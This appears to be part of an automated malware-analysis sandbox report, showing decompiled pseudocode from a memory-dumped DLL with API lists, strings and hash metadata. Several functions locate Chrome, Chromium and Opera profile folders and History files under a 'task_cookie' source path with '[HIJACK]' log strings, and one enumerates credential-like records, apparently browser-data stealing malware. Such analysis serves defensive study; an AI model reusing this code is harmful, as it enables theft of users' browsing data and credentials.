							_t289 = _t302 + 0x1c;
							E1000F2D0(_v96, __eflags,  *_t132);
						} else {
							 *((char*)(E1000E8A0( *((intOrPtr*)(E1000E8F0(_v24)))))) = 1;
							 *((char*)(E1000E8A0(_a12))) = 1;
							 *((char*)(E1000E8A0( *((intOrPtr*)(E1000E8F0( *((intOrPtr*)(E1000E8F0(_v24))))))))) = 0;
							_t147 = E1000E8F0( *((intOrPtr*)(E1000E8F0(_v24))));
							_t289 = _t300 + 0x20;
							_v24 =  *_t147;
						}
					} else {
						_a12 =  *((intOrPtr*)(E1000E900( *((intOrPtr*)(E1000E8F0( *((intOrPtr*)(E1000E8F0(_v24)))))))));
						_t154 = E1000E8A0(_a12);
						_t319 = _t296 + 0x10;
						if( *_t154 != 0) {
							_t157 = E1000E900( *((intOrPtr*)(E1000E8F0(_v24))));
							_t321 = _t319 + 8;
							__eflags = _v24 -  *_t157;
							if(_v24 ==  *_t157) {
								_t169 = E1000E8F0(_v24);
								_t321 = _t321 + 4;
								_v24 =  *_t169;
								E1000F2D0(_v96, __eflags, _v24);
							}
							 *((char*)(E1000E8A0( *((intOrPtr*)(E1000E8F0(_v24)))))) = 1;
							 *((char*)(E1000E8A0( *((intOrPtr*)(E1000E8F0( *((intOrPtr*)(E1000E8F0(_v24))))))))) = 0;
							_t166 = E1000E8F0( *((intOrPtr*)(E1000E8F0(_v24))));
							_t289 = _t321 + 0x1c;
							E1000F4C0(_v96, __eflags,  *_t166);
						} else {
							 *((char*)(E1000E8A0( *((intOrPtr*)(E1000E8F0(_v24)))))) = 1;
							 *((char*)(E1000E8A0(_a12))) = 1;
							 *((char*)(E1000E8A0( *((intOrPtr*)(E1000E8F0( *((intOrPtr*)(E1000E8F0(_v24))))))))) = 0;
							_t182 = E1000E8F0( *((intOrPtr*)(E1000E8F0(_v24))));
							_t289 = _t319 + 0x20;
							_v24 =  *_t182;
						}
					}
				}
				 *((char*)(E1000E8A0( *((intOrPtr*)(E1000F4A0(_v96)))))) = 1;
				E1000F730(_a4, _v20, _v96);
				 *[fs:0x0] = _v16;
				return _a4;
			}



































                                                  0x1000edb3
                                                  0x1000edb5
                                                  0x1000edc0
                                                  0x1000edc1
                                                  0x1000edc8
                                                  0x1000edcc
                                                  0x1000ede0
                                                  0x1000edea
                                                  0x1000edef
                                                  0x1000edfd
                                                  0x1000ee0b
                                                  0x1000ee10
                                                  0x1000ee1a
                                                  0x1000ee1a
                                                  0x1000ee3f
                                                  0x1000ee4e
                                                  0x1000ee5a
                                                  0x1000ee89
                                                  0x1000ee8b
                                                  0x1000eec0
                                                  0x1000eec5
                                                  0x1000eecb
                                                  0x1000eed0
                                                  0x1000eed8
                                                  0x1000eeda
                                                  0x1000eee7
                                                  0x1000eee7
                                                  0x1000ee8d
                                                  0x1000ee91
                                                  0x1000ee96
                                                  0x1000ee9c
                                                  0x1000eea1
                                                  0x1000eea9
                                                  0x1000eeab
                                                  0x1000eeb8
                                                  0x1000eeb8
                                                  0x1000eeba
                                                  0x1000ee5c
                                                  0x1000ee67
                                                  0x1000ee74
                                                  0x1000ee81
                                                  0x1000ee81
                                                  0x1000eeec
                                                  0x1000eeef
                                                  0x1000eefe
                                                  0x1000ef03
                                                  0x1000ef0b
                                                  0x00000000
                                                  0x00000000
                                                  0x1000ef15
                                                  0x1000ef39
                                                  0x1000ef3e
                                                  0x1000ef45
                                                  0x1000f0b9
                                                  0x1000f0c0
                                                  0x1000f0c5
                                                  0x1000f0cb
                                                  0x1000f0cd
                                                  0x1000f14d
                                                  0x1000f152
                                                  0x1000f158
                                                  0x1000f15a
                                                  0x1000f160
                                                  0x1000f165
                                                  0x1000f16a
                                                  0x1000f174
                                                  0x1000f174
                                                  0x1000f190
                                                  0x1000f1b5
                                                  0x1000f1c7
                                                  0x1000f1cc
                                                  0x1000f1d5
                                                  0x1000f0cf
                                                  0x1000f0e6
                                                  0x1000f0f5
                                                  0x1000f11a
                                                  0x1000f12c
                                                  0x1000f131
                                                  0x1000f136
                                                  0x1000f136
                                                  0x1000ef4b
                                                  0x1000ef6f
                                                  0x1000ef76
                                                  0x1000ef7b
                                                  0x1000ef83
                                                  0x1000f003
                                                  0x1000f008
                                                  0x1000f00e
                                                  0x1000f010
                                                  0x1000f016
                                                  0x1000f01b
                                                  0x1000f020
                                                  0x1000f02a
                                                  0x1000f02a
                                                  0x1000f046
                                                  0x1000f06b
                                                  0x1000f07d
                                                  0x1000f082
                                                  0x1000f08b
                                                  0x1000ef85
                                                  0x1000ef9c
                                                  0x1000efab
                                                  0x1000efd0
                                                  0x1000efe2
                                                  0x1000efe7
                                                  0x1000efec
                                                  0x1000efec
                                                  0x1000f090
                                                  0x1000f1da
                                                  0x1000f1f2
                                                  0x1000f200
                                                  0x1000f20b
                                                  0x1000f216

                                                  APIs
                                                  • std::bad_exception::bad_exception.LIBCMTD ref: 1000EDFD
                                                    • Part of subcall function 10028911: RaiseException.KERNEL32(?,?,100235F7,10001F33,?,?,?,?,100235F7,10001F33,1027F310,10401814), ref: 10028951
                                                  • HandleT.LIBCPMTD ref: 1000EE5F
                                                  • HandleT.LIBCPMTD ref: 1000EE6C
                                                  • HandleT.LIBCPMTD ref: 1000EE79
                                                  • HandleT.LIBCPMTD ref: 1000EEA1
                                                  • HandleT.LIBCPMTD ref: 1000EEB0
                                                    • Part of subcall function 1000F4C0: HandleT.LIBCPMTD ref: 1000F554
                                                    • Part of subcall function 1000F4C0: HandleT.LIBCPMTD ref: 1000F563
                                                  • HandleT.LIBCPMTD ref: 1000EED0
                                                  • HandleT.LIBCPMTD ref: 1000EEDF
                                                  • HandleT.LIBCPMTD ref: 1000F1E2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Handle$ExceptionRaisestd::bad_exception::bad_exception
                                                  • String ID: map/set<T> too long
                                                  • API String ID: 1242349364-1285458680
                                                  • Opcode ID: 8e9449f9306d3ccc2e28a1c575853ad9062aa127365a92dfcd5266d0cd5e78e7
                                                  • Instruction ID: 1971496d0e2c208c9c2e3d5f72156d91c7a27aaab9821f0581c1d7942997eee7
                                                  • Opcode Fuzzy Hash: 8e9449f9306d3ccc2e28a1c575853ad9062aa127365a92dfcd5266d0cd5e78e7
                                                  • Instruction Fuzzy Hash: F9E11EF9D002859FEB04DBA4E88196F7375EF89344F148978E4096B35ADA35FD01CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1014B970, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 131COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E1014B970(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v16;
				char _v279;
				char _v280;
				char _v308;
				char _v336;
				char _v340;
				char _v356;
				char _v360;
				intOrPtr _v364;
				char* _v368;
				char* _v372;
				int _t54;
				void* _t62;
				void* _t64;
				void* _t76;
				void* _t103;
				intOrPtr _t104;
				void* _t106;
				void* _t107;
				void* _t108;

				_t103 = __esi;
				_t102 = __edi;
				_t76 = __ebx;
				 *[fs:0x0] = _t104;
				_v340 = 0;
				E10019800( &_v336);
				_v8 = 0;
				_v280 = 0;
				E10025A10(__edi,  &_v279, 0, 0x103);
				_t106 = _t104 - 0x164 + 0xc;
				__imp__SHGetSpecialFolderPathA(0,  &_v280, 0x1c, 0,  *[fs:0x0], 0x1016c0ef, 0xffffffff);
				if(_a8 == 0) {
					_v368 = "\\Chromium\\User Data";
				} else {
					_v368 = "\\Google\\Chrome\\User Data";
				}
				E10025E1D(_v368,  &_v280, 0x104, _v368);
				_t107 = _t106 + 0xc;
				_t54 = PathFileExistsA( &_v280);
				_t111 = _t54;
				if(_t54 != 0) {
					E10014BD0( &_v356, _t111);
					_v8 = 1;
					E10147900(_t76, _t102, _t103,  &_v280,  &_v356, "History");
					_t108 = _t107 + 0xc;
					if(E10014180( &_v356) > 0) {
						_v360 = 0;
						while(1) {
							_t62 = E10014180( &_v356);
							_t113 = _v360 - _t62;
							if(_v360 >= _t62) {
								break;
							}
							_t64 = E100022D0(E100141C0( &_v356, _t113, _v360), "System Profile");
							_t108 = _t108 + 8;
							if(_t64 == 0) {
								E100023C0( &_v308, 0x101ce0ef);
								__eflags = _a8;
								if(__eflags == 0) {
									_v372 = "CHROMIUM";
								} else {
									_v372 = "CHROME";
								}
								E10002400(_t76,  &_v308, _t102, _t103, __eflags, _v372);
								E100023C0( &_v336, 0x101ce0f3);
								E10002400(_t76,  &_v336, _t102, _t103, __eflags, E100141C0( &_v356, __eflags, _v360));
								E10014C00(_a4,  &_v336, __eflags,  &_v336);
								_push(E100141C0( &_v356, __eflags, _v360));
								_push(0x1a6);
								_push("ChromeUserPath_20200617");
								E10145200(_t102, "[HIJACK][%s][%s][%d]: strChromeUserPath = %s\n", PathFindFileNameA(".\\task_cookie\\default_browser.cpp"));
								_t108 = _t108 + 0x14;
							}
							_v360 = _v360 + 1;
						}
						_v340 = 1;
					}
					_v8 = 0;
					E100014A0( &_v356);
				}
				_v364 = _v340;
				_v8 = 0xffffffff;
				E10014BB0( &_v336);
				 *[fs:0x0] = _v16;
				return _v364;
			}
























                                                  0x1014b970
                                                  0x1014b970
                                                  0x1014b970
                                                  0x1014b981
                                                  0x1014b98e
                                                  0x1014b99e
                                                  0x1014b9a3
                                                  0x1014b9aa
                                                  0x1014b9bf
                                                  0x1014b9c4
                                                  0x1014b9d4
                                                  0x1014b9de
                                                  0x1014b9ec
                                                  0x1014b9e0
                                                  0x1014b9e0
                                                  0x1014b9e0
                                                  0x1014ba09
                                                  0x1014ba0e
                                                  0x1014ba18
                                                  0x1014ba1e
                                                  0x1014ba20
                                                  0x1014ba2c
                                                  0x1014ba31
                                                  0x1014ba48
                                                  0x1014ba4d
                                                  0x1014ba5d
                                                  0x1014ba63
                                                  0x1014ba7e
                                                  0x1014ba84
                                                  0x1014ba89
                                                  0x1014ba8f
                                                  0x00000000
                                                  0x00000000
                                                  0x1014baad
                                                  0x1014bab2
                                                  0x1014bab7
                                                  0x1014bac6
                                                  0x1014bacb
                                                  0x1014bacf
                                                  0x1014badd
                                                  0x1014bad1
                                                  0x1014bad1
                                                  0x1014bad1
                                                  0x1014baf4
                                                  0x1014bb04
                                                  0x1014bb22
                                                  0x1014bb31
                                                  0x1014bb48
                                                  0x1014bb49
                                                  0x1014bb4e
                                                  0x1014bb64
                                                  0x1014bb69
                                                  0x1014bb69
                                                  0x1014ba78
                                                  0x1014ba78
                                                  0x1014bb71
                                                  0x1014bb71
                                                  0x1014bb7b
                                                  0x1014bb85
                                                  0x1014bb85
                                                  0x1014bb90
                                                  0x1014bb96
                                                  0x1014bba3
                                                  0x1014bbb1
                                                  0x1014bbbb

                                                  APIs
                                                  • _memset.LIBCMT ref: 1014B9BF
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001C,00000000), ref: 1014B9D4
                                                  • _strcat_s.LIBCMT ref: 1014BA09
                                                  • PathFileExistsA.SHLWAPI(00000000), ref: 1014BA18
                                                  • PathFindFileNameA.SHLWAPI(.\task_cookie\default_browser.cpp,ChromeUserPath_20200617,000001A6,00000000,00000000,?,00000000,00000000,101CE0F3,1026E0A8,101CE0EF,?,System Profile), ref: 1014BB58
                                                  Strings
                                                  • [HIJACK][%s][%s][%d]: strChromeUserPath = %s, xrefs: 1014BB5F
                                                  • .\task_cookie\default_browser.cpp, xrefs: 1014BB53
                                                  • System Profile, xrefs: 1014BA95
                                                  • ChromeUserPath_20200617, xrefs: 1014BB4E
                                                  • History, xrefs: 1014BA35
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Path$File$ExistsFindFolderNameSpecial_memset_strcat_s
                                                  • String ID: .\task_cookie\default_browser.cpp$ChromeUserPath_20200617$History$System Profile$[HIJACK][%s][%s][%d]: strChromeUserPath = %s
                                                  • API String ID: 2302716160-4005611149
                                                  • Opcode ID: 8319eb24f1bbe4d255d370cde703c4438783b0fe77019c6cf10ab775486d92e6
                                                  • Instruction ID: 0b641ac6698a21ca8cbeabfd1c69a220e60e372652a98603b7695c2d1861ed61
                                                  • Opcode Fuzzy Hash: 8319eb24f1bbe4d255d370cde703c4438783b0fe77019c6cf10ab775486d92e6
                                                  • Instruction Fuzzy Hash: EE515DB5800218EBDB25DB50DD92BDAB774FB14700F5041D8E50AA72A1EB766FC4CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1014BD40, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 55%
                                                  			E1014BD40(void* __edi, void* __eflags, intOrPtr _a4) {
				char _v267;
				char _v268;
				char _v272;

				_t26 = __edi;
				_v272 = 0;
				_v268 = 0;
				E10025A10(__edi,  &_v267, 0, 0x103);
				__imp__SHGetSpecialFolderPathA(0,  &_v268, 0x1a, 0);
				E10025E1D( &_v268,  &_v268, 0x104, "\\Opera Software\\Opera Stable");
				if(PathFileExistsA( &_v268) != 0) {
					_push( &_v268);
					_push(0x12e);
					_push("OperaUserPath");
					E10145200(_t26, "[HIJACK][%s][%s][%d]: strOperaUserPath = %s\n", PathFindFileNameA(".\\task_cookie\\default_browser.cpp"));
					E100023C0(_a4,  &_v268);
					_v272 = 1;
				}
				return _v272;
			}






                                                  0x1014bd40
                                                  0x1014bd49
                                                  0x1014bd53
                                                  0x1014bd68
                                                  0x1014bd7d
                                                  0x1014bd94
                                                  0x1014bdab
                                                  0x1014bdb3
                                                  0x1014bdb4
                                                  0x1014bdb9
                                                  0x1014bdcf
                                                  0x1014bde1
                                                  0x1014bde6
                                                  0x1014bde6
                                                  0x1014bdf9

                                                  APIs
                                                  • _memset.LIBCMT ref: 1014BD68
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1014BD7D
                                                  • _strcat_s.LIBCMT ref: 1014BD94
                                                  • PathFileExistsA.SHLWAPI(00000000), ref: 1014BDA3
                                                  • PathFindFileNameA.SHLWAPI(.\task_cookie\default_browser.cpp,OperaUserPath,0000012E,00000000), ref: 1014BDC3
                                                    • Part of subcall function 10145200: _memset.LIBCMT ref: 1014522B
                                                    • Part of subcall function 10145200: OutputDebugStringA.KERNEL32(?,?,?,?,?,1014BB69,[HIJACK][%s][%s][%d]: strChromeUserPath = %s), ref: 10145263
                                                  Strings
                                                  • [HIJACK][%s][%s][%d]: strOperaUserPath = %s, xrefs: 1014BDCA
                                                  • .\task_cookie\default_browser.cpp, xrefs: 1014BDBE
                                                  • \Opera Software\Opera Stable, xrefs: 1014BD83
                                                  • OperaUserPath, xrefs: 1014BDB9
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Path$File_memset$DebugExistsFindFolderNameOutputSpecialString_strcat_s
                                                  • String ID: .\task_cookie\default_browser.cpp$OperaUserPath$[HIJACK][%s][%s][%d]: strOperaUserPath = %s$\Opera Software\Opera Stable
                                                  • API String ID: 540892888-3178255495
                                                  • Opcode ID: 7951e80b4ecc7e208796e453a21af3c16cf30cc148f99e517ed51d0c55d0e4ef
                                                  • Instruction ID: 95bf60a413d9745c220dda7655d86f48f1631bb9b4c777794abd3e1b2b92f022
                                                  • Opcode Fuzzy Hash: 7951e80b4ecc7e208796e453a21af3c16cf30cc148f99e517ed51d0c55d0e4ef
                                                  • Instruction Fuzzy Hash: 7C019679D04218A7E710EB60DC86FDA7778EB25700F4041C4FA89AA5C1EBF56AD48FA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1000EC00, Relevance: 13.6, APIs: 9, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E1000EC00(intOrPtr __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t23;
				char* _t27;
				intOrPtr* _t30;
				intOrPtr _t32;
				intOrPtr _t35;

				_push(__ecx);
				_v8 = __ecx;
				_t23 = E1000F9B0(_v8, __eflags,  *((intOrPtr*)(E1000F4A0(_a4))),  *((intOrPtr*)(_v8 + 4)));
				 *((intOrPtr*)(E1000F4A0(_v8))) = _t23;
				 *((intOrPtr*)(_v8 + 8)) = E1000D5C0(_a4);
				_t27 = E1000E8B0( *((intOrPtr*)(E1000F4A0(_v8))));
				_t68 =  *_t27;
				if( *_t27 != 0) {
					 *((intOrPtr*)(E1000F2B0(_v8))) =  *((intOrPtr*)(_v8 + 4));
					_t30 = E1000F480(_v8);
					 *_t30 =  *((intOrPtr*)(_v8 + 4));
				} else {
					_t32 = E1000F440(_t68,  *((intOrPtr*)(E1000F4A0(_v8))));
					 *((intOrPtr*)(E1000F2B0(_v8))) = _t32;
					_t35 = E1000F400(_t68,  *((intOrPtr*)(E1000F4A0(_v8))));
					_t30 = E1000F480(_v8);
					 *_t30 = _t35;
				}
				return _t30;
			}









                                                  0x1000ec03
                                                  0x1000ec05
                                                  0x1000ec1d
                                                  0x1000ec2c
                                                  0x1000ec39
                                                  0x1000ec47
                                                  0x1000ec52
                                                  0x1000ec54
                                                  0x1000eca4
                                                  0x1000eca9
                                                  0x1000ecb4
                                                  0x1000ec56
                                                  0x1000ec61
                                                  0x1000ec73
                                                  0x1000ec80
                                                  0x1000ec8d
                                                  0x1000ec92
                                                  0x1000ec92
                                                  0x1000ecba

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Handle
                                                  • String ID:
                                                  • API String ID: 2519475695-0
                                                  • Opcode ID: 873d2b5cd8dd77ec5e4f4f390e9462cb508c006000b0f7c610468eb1e551d27c
                                                  • Instruction ID: 25c4875d66efe198f66daf33b7a9bdd850e983ba3eb6b087f77aa2fcdf92ed4e
                                                  • Opcode Fuzzy Hash: 873d2b5cd8dd77ec5e4f4f390e9462cb508c006000b0f7c610468eb1e551d27c
                                                  • Instruction Fuzzy Hash: 0521ECB9910104EFE704DB58C99286F77B5EF8938472041ACE8055B769DB31BE01EBD1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 100A9490, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E100A9490(void* __edi) {
				long _v8;
				void* _v12;
				struct _SECURITY_ATTRIBUTES _v24;
				void* _t14;
				void* _t26;
				void* _t27;

				_t26 = __edi;
				_v12 = OpenFileMappingA(6, 0, "ff_signature");
				_v8 = 0;
				if(_v12 == 0) {
					_v8 = 1;
					_v24.nLength = 0xc;
					_v24.lpSecurityDescriptor = 0;
					_v24.bInheritHandle = 1;
					_v12 = CreateFileMappingA(0xffffffff,  &_v24, 4, 0, 0x400, "ff_signature");
					E100A93F0(_v12);
					_t27 = _t27 + 4;
				}
				_t14 = MapViewOfFile(_v12, 6, 0, 0, 0x400);
				 *0x10404ec4 = _t14;
				if(_v8 != 0) {
					 *( *0x10404ec4) = 0;
					E10025A10(_t26,  *0x10404ec4 + 4, 0, 0x3e8);
					return FlushViewOfFile( *0x10404ec4, 0x3ec);
				}
				return _t14;
			}









                                                  0x100a9490
                                                  0x100a94a5
                                                  0x100a94a8
                                                  0x100a94b3
                                                  0x100a94b5
                                                  0x100a94bc
                                                  0x100a94c3
                                                  0x100a94ca
                                                  0x100a94eb
                                                  0x100a94f2
                                                  0x100a94f7
                                                  0x100a94f7
                                                  0x100a9509
                                                  0x100a950f
                                                  0x100a9518
                                                  0x100a951f
                                                  0x100a9536
                                                  0x00000000
                                                  0x100a954a
                                                  0x100a9553

                                                  APIs
                                                  • OpenFileMappingA.KERNEL32 ref: 100A949F
                                                  • CreateFileMappingA.KERNEL32 ref: 100A94E5
                                                    • Part of subcall function 100A93F0: GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,00000000,00000000), ref: 100A9446
                                                    • Part of subcall function 100A93F0: SetSecurityInfo.ADVAPI32(00000000,00000006,00000010,00000000,00000000,00000000,00000000), ref: 100A9462
                                                    • Part of subcall function 100A93F0: LocalFree.KERNEL32(00000000), ref: 100A947B
                                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000400), ref: 100A9509
                                                  • _memset.LIBCMT ref: 100A9536
                                                  • FlushViewOfFile.KERNEL32(?,000003EC), ref: 100A954A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$MappingSecurityView$CreateDescriptorFlushFreeInfoLocalOpenSacl_memset
                                                  • String ID: ff_signature$ff_signature
                                                  • API String ID: 16605680-3114255398
                                                  • Opcode ID: e0ae191729b4b01387e7f1508b6b6fb81772dcd73ea6a32ee894798f85d08583
                                                  • Instruction ID: a7db16a1703d1c331ef1490eab614682afc5956ba7178999b4c3ac2ca2649a10
                                                  • Opcode Fuzzy Hash: e0ae191729b4b01387e7f1508b6b6fb81772dcd73ea6a32ee894798f85d08583
                                                  • Instruction Fuzzy Hash: DE118FB8A40304FBE700DFA4CD8AB9E7BB5FB44709F104254F6057A2C5D7B56A40CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1014B0E0, Relevance: 10.7, APIs: 7, Instructions: 222COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 77%
                                                  			E1014B0E0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v16;
				char _v280;
				char _v540;
				char _v800;
				char _v804;
				char _v820;
				char _v824;
				char _v828;
				char _v832;
				signed int _v836;
				char _v840;
				char _v844;
				char _v848;
				char _v852;
				char _v884;
				char _v912;
				char _v948;
				char _v976;
				intOrPtr _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				signed int _v992;
				void* __ebp;
				signed char _t102;
				intOrPtr _t116;
				intOrPtr _t133;
				intOrPtr _t135;
				void* _t136;
				signed int _t163;
				signed int _t165;
				void* _t180;
				void* _t181;
				intOrPtr _t182;
				void* _t183;

				_t181 = __esi;
				_t180 = __edi;
				_t136 = __ebx;
				 *[fs:0x0] = _t182;
				_t183 = _t182 - 0x3d0;
				_v992 = 0;
				_v824 = 0;
				_v832 = 0;
				E10015780( &_v820, __eflags);
				_v8 = 0;
				_v832 =  *0x104027dc(0,  &_v824,  &_v828,  *[fs:0x0], 0x1016b78e, 0xffffffff);
				if(_v832 != 0) {
					L31:
					E100157B0(_a4, _t163, __eflags,  &_v820);
					_t165 = _v992 | 0x00000001;
					__eflags = _t165;
					_v992 = _t165;
					_v8 = 0xffffffff;
					E10015890( &_v820);
					 *[fs:0x0] = _v16;
					return _a4;
				}
				_v836 = 0;
				while(_v836 < _v824) {
					_v832 =  *0x104026cc((_v836 << 4) + _v828, 0,  &_v804);
					if(_v832 != 0) {
						L30:
						_t163 = _v836 + 1;
						__eflags = _t163;
						_v836 = _t163;
						continue;
					}
					_v832 =  *0x104027e0(_v804, 0x200,  &_v844,  &_v840);
					if(_v832 != 0) {
						L29:
						 *0x104027d8(_v804);
						goto L30;
					}
					_v848 = 0;
					while(_v848 < _v844) {
						E10015670( &_v976);
						_v8 = 1;
						_v852 = 0;
						E10025A10(_t180,  &_v976, 0, 0x78);
						_t183 = _t183 + 0xc;
						_t102 = E10015650();
						_t197 = _t102 & 0x000000ff;
						if((_t102 & 0x000000ff) == 0) {
							__eflags = E10015630() & 0x000000ff;
							if(__eflags != 0) {
								_t133 = E1014AFD0(_t136, _t180, _t181, __eflags, _v804, _v840, _v848,  &_v976);
								_t183 = _t183 + 0x10;
								_v852 = _t133;
							}
						} else {
							_t135 = E1014AEB0(_t136, _t180, _t181, _t197, _v804, _v840, _v848,  &_v976);
							_t183 = _t183 + 0x10;
							_v852 = _t135;
						}
						if(_v852 != 0 && E10002430( &_v948) > 0 && E10002430( &_v912) > 0 && E10002430( &_v884) > 0) {
							_v984 = E10145FC0(_t136, _t180, _t181, E10015760( &_v948));
							_v988 = E10145FC0(_t136, _t180, _t181, E10015760( &_v912));
							_t116 = E10145FC0(_t136, _t180, _t181, E10015760( &_v884));
							_t183 = _t183 + 0xc;
							_v980 = _t116;
							if(_v984 != 0 && _v988 != 0) {
								_t204 = _v980;
								if(_v980 != 0) {
									E10025A10(_t180,  &_v800, 0, 0x104);
									E10025A10(_t180,  &_v540, 0, 0x104);
									E10025A10(_t180,  &_v280, 0, 0x104);
									E10025A8A( &_v800,  &_v800, 0x104, _v984);
									E10025A8A( &_v800,  &_v540, 0x104, _v988);
									E10025A8A(_v980,  &_v280, 0x104, _v980);
									_t183 = _t183 + 0x48;
									E10015A40( &_v820, _v980, _t204,  &_v800);
								}
							}
							_t205 = _v984;
							if(_v984 != 0) {
								_push(_v984);
								E100252D1(_t136, _t180, _t181, _t205);
								_t183 = _t183 + 4;
							}
							_t206 = _v988;
							if(_v988 != 0) {
								_push(_v988);
								E100252D1(_t136, _t180, _t181, _t206);
								_t183 = _t183 + 4;
							}
							_t207 = _v980;
							if(_v980 != 0) {
								_push(_v980);
								E100252D1(_t136, _t180, _t181, _t207);
								_t183 = _t183 + 4;
							}
						}
						_v8 = 0;
						E100156B0( &_v976);
						_v848 = _v848 + 1;
					}
					 *0x104027e4(_v840);
					goto L29;
				}
				goto L31;
			}






































                                                  0x1014b0e0
                                                  0x1014b0e0
                                                  0x1014b0e0
                                                  0x1014b0f1
                                                  0x1014b0f8
                                                  0x1014b0fe
                                                  0x1014b108
                                                  0x1014b112
                                                  0x1014b122
                                                  0x1014b127
                                                  0x1014b144
                                                  0x1014b151
                                                  0x1014b48b
                                                  0x1014b495
                                                  0x1014b4a0
                                                  0x1014b4a0
                                                  0x1014b4a3
                                                  0x1014b4a9
                                                  0x1014b4b6
                                                  0x1014b4c1
                                                  0x1014b4cb
                                                  0x1014b4cb
                                                  0x1014b157
                                                  0x1014b172
                                                  0x1014b1a3
                                                  0x1014b1b0
                                                  0x1014b486
                                                  0x1014b169
                                                  0x1014b169
                                                  0x1014b16c
                                                  0x00000000
                                                  0x1014b16c
